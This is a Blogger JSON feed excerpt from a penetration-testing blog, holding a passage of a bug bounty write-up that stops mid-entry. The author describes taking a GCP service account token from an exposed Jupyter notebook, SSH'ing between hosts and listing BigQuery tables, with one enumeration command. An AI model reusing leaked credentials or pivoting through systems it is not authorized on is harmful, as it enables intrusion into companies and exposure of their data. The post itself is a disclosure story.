// API callback
related_results_labels_thumbs({"version":"1.0","encoding":"UTF-8","feed":{"xmlns":"http://www.w3.org/2005/Atom","xmlns$openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns$blogger":"http://schemas.google.com/blogger/2008","xmlns$georss":"http://www.georss.org/georss","xmlns$gd":"http://schemas.google.com/g/2005","xmlns$thr":"http://purl.org/syndication/thread/1.0","id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238"},"updated":{"$t":"2025-01-05T17:25:28.521-05:00"},"category":[{"term":"Pentesting"},{"term":"Metasploit"},{"term":"cktricky"},{"term":"hacking"},{"term":"Book Reviews"},{"term":"Security Conferences"},{"term":"news"},{"term":"devoops"},{"term":"Chris Gates"},{"term":"client side attacks"},{"term":"devops"},{"term":"rant"},{"term":"web application testing"},{"term":"oracle"},{"term":"low2pwned"},{"term":"information Gathering"},{"term":"pwnage"},{"term":"auxiliary modules"},{"term":"carnal0wnage"},{"term":"cloud"},{"term":"enumeration"},{"term":"EthicalHacker.net"},{"term":"Learn Security Online"},{"term":"chicagocon"},{"term":"Kubernetes"},{"term":"Wireless"},{"term":"day in the life"},{"term":"jenkins"},{"term":"Maltego"},{"term":"certification"},{"term":"meterpreter"},{"term":"mimikatz"},{"term":"pass the hash"},{"term":"phishing"},{"term":"politics"},{"term":"Security"},{"term":"malware"},{"term":"password cracking"},{"term":"post-exploitation"},{"term":"powershell"},{"term":"Incident Response"},{"term":"android"},{"term":"automation"},{"term":"blackhat DC"},{"term":"exploits"},{"term":"linux"},{"term":"press"},{"term":"privacy"},{"term":"token impersonation"},{"term":"toorcon"},{"term":"SQL  Injection"},{"term":"incognito"},{"term":"mubix"},{"term":"scanning"},{"term":"shmoocon 09"},{"term":"webcasts"},{"term":"wrap-up"},{"term":"DNS"},{"term":"HackerDefender"},{"term":"Security Metrics"},{"term":"VNC"},{"term":"aircrack-ng"},{"term":"chris nickerson"},{"term":"fail"},{"term":"mike 
murray"},{"term":"nmap"},{"term":"rootkit"},{"term":"shmoocon 08"},{"term":"shotgun posts"},{"term":"token kidnaping"},{"term":"Crash Course in Penetration Testing"},{"term":"Full Scope Security"},{"term":"IPv6"},{"term":"Paterva"},{"term":"Physical Security"},{"term":"Research"},{"term":"SOURCE Boston 2009"},{"term":"Scapy"},{"term":"antivirus"},{"term":"coldfusion"},{"term":"hack tools"},{"term":"hakin9"},{"term":"http options"},{"term":"identity theft"},{"term":"interviews"},{"term":"jboss"},{"term":"karma"},{"term":"nessus"},{"term":"passthehash toolkit"},{"term":"podcasts"},{"term":"privacy is dead"},{"term":"rpcclient"},{"term":"snmp"},{"term":"social engineering"},{"term":"ubuntu"},{"term":"webdav"},{"term":"AttackResearch"},{"term":"Botnets"},{"term":"Dan Hoffman"},{"term":"GoogleAds"},{"term":"Joe McCray"},{"term":"MAME"},{"term":"NTP"},{"term":"Network Mapping"},{"term":"OMG Python"},{"term":"Packet Analysis"},{"term":"Programming"},{"term":"RetroPie"},{"term":"SCADA"},{"term":"Security Data Visualization"},{"term":"Traceroute"},{"term":"Traceroute Visulization"},{"term":"airodump-ng"},{"term":"attack analysis"},{"term":"aws"},{"term":"backtrack2"},{"term":"backtrack3"},{"term":"blue teaming"},{"term":"cadaver"},{"term":"citrix hacking"},{"term":"conspiracy"},{"term":"coolest Dad ever"},{"term":"defcon"},{"term":"defense"},{"term":"digging into the chewy center"},{"term":"elasticsearch"},{"term":"emulators"},{"term":"foursquare"},{"term":"ike-scan"},{"term":"install your own linux distro"},{"term":"java"},{"term":"javascript"},{"term":"jeremiah grossman"},{"term":"john the ripper"},{"term":"kanoOS kano computers"},{"term":"karmasploit"},{"term":"karmetasploit"},{"term":"lotus domino"},{"term":"mentoring"},{"term":"mssql"},{"term":"mssql_login"},{"term":"mssql_ping"},{"term":"msvctl"},{"term":"null-session"},{"term":"paranoia"},{"term":"privilege escalation"},{"term":"purple teaming"},{"term":"raspberry pi"},{"term":"risk 
management"},{"term":"ruby"},{"term":"scripting"},{"term":"sensepost"},{"term":"sqlmap"},{"term":"ssl"},{"term":"stupid users"},{"term":"tempest"},{"term":"twitter"},{"term":"windows vista"},{"term":"8570.1"},{"term":"AFP"},{"term":"DNS Fingerprinting"},{"term":"DNS exploit"},{"term":"Dr-crack"},{"term":"EFF NSA Shirt"},{"term":"Endpoint Security"},{"term":"Fabric"},{"term":"Fresh New Look"},{"term":"Full Scope Testing"},{"term":"Fuzzing: Brute Force Vulnerability Discovery"},{"term":"GCP"},{"term":"Geek Mafia"},{"term":"HE Windows"},{"term":"HR Geeks"},{"term":"Hacking Exposed Windows"},{"term":"IE7 Exploit"},{"term":"Information Security Day"},{"term":"Joe Klein"},{"term":"Johnny Long"},{"term":"LG voyager"},{"term":"MAC addresses"},{"term":"Mail"},{"term":"Metasploit Pro"},{"term":"No Place To Hide"},{"term":"No Tech Hacking"},{"term":"NoVA Sec"},{"term":"P2P"},{"term":"Programming Book Review Criteria"},{"term":"QEMU"},{"term":"SOURCE Boston 2008"},{"term":"The Art of Software Security Testing"},{"term":"The Craft of System Security"},{"term":"Traceroute Aggregation"},{"term":"Val Smith"},{"term":"WTF"},{"term":"XSS"},{"term":"amplification attacks"},{"term":"apple filing protocol"},{"term":"brute forcing"},{"term":"bugbounty"},{"term":"burp suite"},{"term":"bypassuac"},{"term":"chef"},{"term":"cisco"},{"term":"cisco asa"},{"term":"conti"},{"term":"cve"},{"term":"databases"},{"term":"deauth attack"},{"term":"defeating AV"},{"term":"dhcp script injection"},{"term":"digital signatures"},{"term":"dll"},{"term":"docker"},{"term":"domo kun video"},{"term":"ec2"},{"term":"education"},{"term":"eeepc"},{"term":"enum4linux"},{"term":"espionage"},{"term":"excel macro"},{"term":"exotic liability"},{"term":"exploit dev course"},{"term":"fckeditor"},{"term":"file format"},{"term":"firewire"},{"term":"forenics"},{"term":"full disclosure"},{"term":"github"},{"term":"google dorks"},{"term":"gsecdump"},{"term":"hack 
minecraft"},{"term":"hadoop"},{"term":"hijacking"},{"term":"http-dir-enum"},{"term":"ida pro"},{"term":"impacket"},{"term":"infosecwriters.com"},{"term":"irc"},{"term":"java decompile"},{"term":"kerberos"},{"term":"kickstart files"},{"term":"kismet"},{"term":"layer2"},{"term":"lft"},{"term":"life"},{"term":"linkedin"},{"term":"local root"},{"term":"local to domain account"},{"term":"metacab"},{"term":"metagoofil"},{"term":"motorola xoom root"},{"term":"mwr InfoSecurity"},{"term":"ncrack"},{"term":"netapp"},{"term":"non-english"},{"term":"notes"},{"term":"null sa"},{"term":"offtopic"},{"term":"opinion"},{"term":"osx"},{"term":"password filters"},{"term":"pentoo"},{"term":"persistence"},{"term":"pidgin"},{"term":"portqry"},{"term":"printer hacking"},{"term":"procdump"},{"term":"process injection"},{"term":"proxychains"},{"term":"puttyhijack"},{"term":"pwn plug elite"},{"term":"quotes"},{"term":"rainbow tables"},{"term":"reDuh"},{"term":"red team"},{"term":"red teaming"},{"term":"redis"},{"term":"resource scripts"},{"term":"rfid"},{"term":"richard bejtlich"},{"term":"roomwizard"},{"term":"scams"},{"term":"scp"},{"term":"sensitive data leakage"},{"term":"server-status"},{"term":"sharepoint"},{"term":"shmoocon 15"},{"term":"silc"},{"term":"slicehost"},{"term":"smbshell"},{"term":"sqid"},{"term":"sqlite3"},{"term":"sticky keys"},{"term":"sticky ports"},{"term":"sunday comics"},{"term":"swfscan"},{"term":"talks"},{"term":"thin client hacking"},{"term":"timestomp"},{"term":"tnscmd"},{"term":"tsa"},{"term":"unicornscan"},{"term":"upload.asp"},{"term":"usernames"},{"term":"vagrant"},{"term":"volatility"},{"term":"volreg"},{"term":"vulnerability"},{"term":"w3af"},{"term":"webgoat"},{"term":"webshells"},{"term":"weridAAL"},{"term":"wmap"},{"term":"wmic"},{"term":"wordpress"},{"term":"xml"},{"term":"yersinia"},{"term":"youtube"},{"term":"zone transfers"}],"title":{"type":"text","$t":"Carnal0wnage 
Blog"},"subtitle":{"type":"html","$t":""},"link":[{"rel":"http://schemas.google.com/g/2005#feed","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/posts\/default"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/-\/Pentesting?alt=json-in-script\u0026max-results=6"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/search\/label\/Pentesting"},{"rel":"hub","href":"http://pubsubhubbub.appspot.com/"},{"rel":"next","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/-\/Pentesting\/-\/Pentesting?alt=json-in-script\u0026start-index=7\u0026max-results=6"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"generator":{"version":"7.00","uri":"http://www.blogger.com","$t":"Blogger"},"openSearch$totalResults":{"$t":"199"},"openSearch$startIndex":{"$t":"1"},"openSearch$itemsPerPage":{"$t":"6"},"entry":[{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-2552988186359746960"},"published":{"$t":"2020-03-13T22:10:00.001-04:00"},"updated":{"$t":"2020-03-24T15:56:05.127-04:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"bugbounty"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"What is your GCP infra worth?...about ~$700 [Bugbounty]"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\nBugBounty story\u0026nbsp;#bugbountytips\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nA fixed but they didn't pay the bugbounty story...\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nTimeline:\u003Cbr \/\u003E\n\u003Cul\u003E\n\u003Cli\u003Ereported 21 Oct 2019\u003C\/li\u003E\n\u003Cli\u003Evalidated at Critical\u0026nbsp; 
23 Oct 2019\u003C\/li\u003E\n\u003Cli\u003Evalidated as fixed 30 Oct 2019\u003C\/li\u003E\n\u003Cli\u003EBounty amount stated (IDR 10.000.000 = ~700 USD) 12 Nov 2019\u003C\/li\u003E\n\u003Cli\u003EInformation provided for payment 16 Nov 2019\u003C\/li\u003E\n\u003Cli\u003E13 March 2020 - Never paid - blog post posted\u003C\/li\u003E\n\u003Cli\u003E19 March 2020\u0026nbsp; - received bounty of $565.86\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cbr \/\u003E\nThere are lots of applications that are SAAS - \u003Ca href=\"https:\/\/www.youtube.com\/watch?v=JVCsy-T94k4\u0026amp;list=UUef0TWni8ghLcJphdmDBoxw\" target=\"_blank\"\u003EShell as a Service\u003C\/a\u003E. Jupyter Notebook is one of these with its running code feature as well as its terminal functionality.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nWhile I was trolling shodan looking for vulnerable boxes i came across an open Jupyter notebook belonging to \u003Ca href=\"https:\/\/www.tokopedia.com\/\" target=\"_blank\"\u003ETokopedia\u003C\/a\u003E. 
This wasn't obvious at first, but it will become clear how I identified this as you check out the screenshots.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0\/s1600\/notebooks-main-page.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"495\" data-original-width=\"1600\" height=\"198\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0\/s640\/notebooks-main-page.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EOpen Jupyter notebook server\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\nI did a post on what to do when you find a GCP key in a \u003Ca href=\"http:\/\/carnal0wnage.attackresearch.com\/2019\/01\/i-found-gcp-service-account-tokennow.html\" target=\"_blank\"\u003Eprevious post\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nThis is especially important when people leave their GCP service account keys in folders\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: 
center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh2n08X8w7IInnbAzELcZjLZ6FAYnEvoS3OQi0_2Im_4nLevSkodPop1ykyI9u9aKvOIV54MdUHMITkN3e7Etwe1JtKv2zBpEhbI1Affi1A1gD7sP1T0ukhsuyHOGBikoGYraPOg4HyMtk\/s1600\/Screen+Shot+2020-01-06+at+7.42.19+PM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"130\" data-original-width=\"1600\" height=\"50\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh2n08X8w7IInnbAzELcZjLZ6FAYnEvoS3OQi0_2Im_4nLevSkodPop1ykyI9u9aKvOIV54MdUHMITkN3e7Etwe1JtKv2zBpEhbI1Affi1A1gD7sP1T0ukhsuyHOGBikoGYraPOg4HyMtk\/s640\/Screen+Shot+2020-01-06+at+7.42.19+PM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EWhen you leave your service token in the folder for all to find\/use\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\nIn this case it was base64 encoded - but easy to fix\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEifaY4fiCJXbqMUcaR6yUvwZNnD0g3wEPRDp5x-chfMlQI6y_LMnxlVc8cgd6RxWkWdyaJP_0CNAIl-bu95XSJGLYrQLMcIse0C3x9yrk6gnlaRg5bLAiFYSx0gw6KZnHNcEQT1zNQkf3M\/s1600\/token-b64decode.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1440\" data-original-width=\"1318\" height=\"320\" 
src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEifaY4fiCJXbqMUcaR6yUvwZNnD0g3wEPRDp5x-chfMlQI6y_LMnxlVc8cgd6RxWkWdyaJP_0CNAIl-bu95XSJGLYrQLMcIse0C3x9yrk6gnlaRg5bLAiFYSx0gw6KZnHNcEQT1zNQkf3M\/s320\/token-b64decode.png\" width=\"292\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003Eservice account token b64 decoded\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\nIt was also in the error output of one of the jupyter notebooks\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbgyaCobVBekZLeX8a4SrZHmQWMaEt-hR4orMKBiFTfzDwqY8ujECrV7IUUYr838sLghncrf6-czKGLF-6wvL_3j07IBUIVOaKKPNEs6KLa5BeDSaVb1ATi_Vf4NXa6VVnBlEeki2qRK4\/s1600\/creds-via-notebook-error.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"635\" data-original-width=\"1600\" height=\"254\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjbgyaCobVBekZLeX8a4SrZHmQWMaEt-hR4orMKBiFTfzDwqY8ujECrV7IUUYr838sLghncrf6-czKGLF-6wvL_3j07IBUIVOaKKPNEs6KLa5BeDSaVb1ATi_Vf4NXa6VVnBlEeki2qRK4\/s640\/creds-via-notebook-error.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nI had used the terminal to do some basic poking around to find the owner\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi7FWyY-hPD5RDfZ-87y8IBiM5cBtkZUlonSvjzy4H_FfQLUZL3Sum-hLHEckr8HtGm8_S0_rxu_WtrzD6Qf-o49mLoTx75KACn9fOe0VUVOuND8d1BQcGGRIc5q4Qnv3ZtZWTW0BfPW0s\/s1600\/uname-a-tokepedia-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" 
data-original-height=\"283\" data-original-width=\"1600\" height=\"112\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi7FWyY-hPD5RDfZ-87y8IBiM5cBtkZUlonSvjzy4H_FfQLUZL3Sum-hLHEckr8HtGm8_S0_rxu_WtrzD6Qf-o49mLoTx75KACn9fOe0VUVOuND8d1BQcGGRIc5q4Qnv3ZtZWTW0BfPW0s\/s640\/uname-a-tokepedia-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg1guzNQwRxBHKVGUnm8N88HWhqLhF7oNAvOLJoqONXTtQ3Gq8HdnSjuw6ZHyteWQuPXjqw3VK4DNcBzJMTfJ-j962LfOzJxFk6dPd2TOSndAHcVNAl3osDrASfTt1Rrzh92TK_7chxUy4\/s1600\/creds-via-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1022\" data-original-width=\"1600\" height=\"408\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg1guzNQwRxBHKVGUnm8N88HWhqLhF7oNAvOLJoqONXTtQ3Gq8HdnSjuw6ZHyteWQuPXjqw3VK4DNcBzJMTfJ-j962LfOzJxFk6dPd2TOSndAHcVNAl3osDrASfTt1Rrzh92TK_7chxUy4\/s640\/creds-via-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan id=\"goog_513689851\"\u003E\u003C\/span\u003E\u003Cspan id=\"goog_513689852\"\u003E\u003C\/span\u003E\u003Cbr \/\u003E\nOnce I identified it was owned by someone with a bug bounty program I figured it was ok to prove access and impact.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nPer the GCP blog post once you have the service account token you authenticate and interact with services your token has access to\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjAm9S5leVr9SYE66HVrk31CDcCwQuwxhk6dyk-Ou6ueriO8N4_H81bXmAvJ6o9T5hmu5BUwSWBVM0jAR-WHP_KiAVKocERcwCyJthdmsAM6LPeKbwo1w7YMD8fYaJ2QTrQAplIHRHKvqE\/s1600\/tokepedia-gcp-compute-list.png\" 
imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"269\" data-original-width=\"1600\" height=\"106\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjAm9S5leVr9SYE66HVrk31CDcCwQuwxhk6dyk-Ou6ueriO8N4_H81bXmAvJ6o9T5hmu5BUwSWBVM0jAR-WHP_KiAVKocERcwCyJthdmsAM6LPeKbwo1w7YMD8fYaJ2QTrQAplIHRHKvqE\/s640\/tokepedia-gcp-compute-list.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nThe handy thing about getting a shell on a GCP compute host is that all the GCP utils are installed and \"just work\" I actually didn't need to do anything from an external host I was able to start ssh'ing to other hosts from within the jupyter terminal.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi_4G7yZi8lC7J0g5H7NzD7Bnn9jhzHyKxTkYKNzr-WSyAC2a37TxjN5v8o-12v7az9bo1iKyrWt-RK5fYXuA47aY90i8pQMa59_tuaT9zBRZ4WZgxQ6xbJRlQPYAeUyvC7XkaGaRABS9Y\/s1600\/ssh+to+seonper-1-from-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"952\" data-original-width=\"1600\" height=\"380\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi_4G7yZi8lC7J0g5H7NzD7Bnn9jhzHyKxTkYKNzr-WSyAC2a37TxjN5v8o-12v7az9bo1iKyrWt-RK5fYXuA47aY90i8pQMa59_tuaT9zBRZ4WZgxQ6xbJRlQPYAeUyvC7XkaGaRABS9Y\/s640\/ssh+to+seonper-1-from-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEigGLUpBY9W5kOLTNEu9m6rIt4OfkbMDv2HkshHgL6Nl3-StogRP2bwpGJx-CSG2wRHZVAZG9mgRmzC7BZUDSauYkmYVmkjgfNIjSXpFEi1nD8UgezGAzxaWlsGH4BMJCkMR7J8WJ2zCfA\/s1600\/ssh+to+seonper-1.png\" imageanchor=\"1\" 
style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"552\" data-original-width=\"1590\" height=\"222\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEigGLUpBY9W5kOLTNEu9m6rIt4OfkbMDv2HkshHgL6Nl3-StogRP2bwpGJx-CSG2wRHZVAZG9mgRmzC7BZUDSauYkmYVmkjgfNIjSXpFEi1nD8UgezGAzxaWlsGH4BMJCkMR7J8WJ2zCfA\/s640\/ssh+to+seonper-1.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjXL_ObVY1nk5uX_eUSb1uOU6VAhIQXNlPOK-rrFVfY3LaHaTHK7HBFdpcB0QCQ2X780dj0WgyIMphUFmiWJgCr_Gtvr2vyDwyx9hw-CAIP2fBlfNfM5VSWnT3cyVQn-M_7S9q5obsr15w\/s1600\/ssh-abe-mf-1-from-jupyter.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"968\" data-original-width=\"1600\" height=\"386\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjXL_ObVY1nk5uX_eUSb1uOU6VAhIQXNlPOK-rrFVfY3LaHaTHK7HBFdpcB0QCQ2X780dj0WgyIMphUFmiWJgCr_Gtvr2vyDwyx9hw-CAIP2fBlfNfM5VSWnT3cyVQn-M_7S9q5obsr15w\/s640\/ssh-abe-mf-1-from-jupyter.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgNTfIv1AjnysH06UfkJ6H2EHaajz3QtLVRXafyaDyl2Pq3V4fMBjFquWJy3K010ccfePAoox9AK0vn1fXJI1MryJhBji1TdXqKIXEzbum1TEuF4JT4iJiP1UoprSSMlWFhyphenhyphenRjxapvne4Q\/s1600\/cat+bash_history+on+ab-md-1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"962\" data-original-width=\"1600\" height=\"384\" 
src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgNTfIv1AjnysH06UfkJ6H2EHaajz3QtLVRXafyaDyl2Pq3V4fMBjFquWJy3K010ccfePAoox9AK0vn1fXJI1MryJhBji1TdXqKIXEzbum1TEuF4JT4iJiP1UoprSSMlWFhyphenhyphenRjxapvne4Q\/s640\/cat+bash_history+on+ab-md-1.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nBigquery tables o_0\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E[+] Bigquery access [+]\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ebq ls --format=prettyjson --project_id tokopedia-970\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Ctable cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhs26OVfvWTagWd6XkF40lnb13jbUNMBTvSbCcbgtzo6g9ijqjxoKaL9yUgIpA5x2kXA2QxcixSBtFouSALOhlMJMrhpmHj6UkyhnpFQjMDNotTH4tke5xUeSTFy9au0jbdGPe2QlUjGc0\/s1600\/Screen+Shot+2020-03-13+at+10.23.35+PM.png\" imageanchor=\"1\" style=\"clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"724\" data-original-width=\"998\" height=\"232\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhs26OVfvWTagWd6XkF40lnb13jbUNMBTvSbCcbgtzo6g9ijqjxoKaL9yUgIpA5x2kXA2QxcixSBtFouSALOhlMJMrhpmHj6UkyhnpFQjMDNotTH4tke5xUeSTFy9au0jbdGPe2QlUjGc0\/s320\/Screen+Shot+2020-03-13+at+10.23.35+PM.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EDat billing table 
